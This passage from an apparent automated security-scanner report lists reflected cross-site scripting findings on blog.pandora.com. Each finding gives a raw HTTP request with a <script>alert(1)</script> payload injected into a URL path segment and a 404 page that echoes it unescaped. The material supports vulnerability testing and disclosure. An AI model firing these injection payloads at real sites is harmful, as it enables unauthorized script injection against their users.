Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
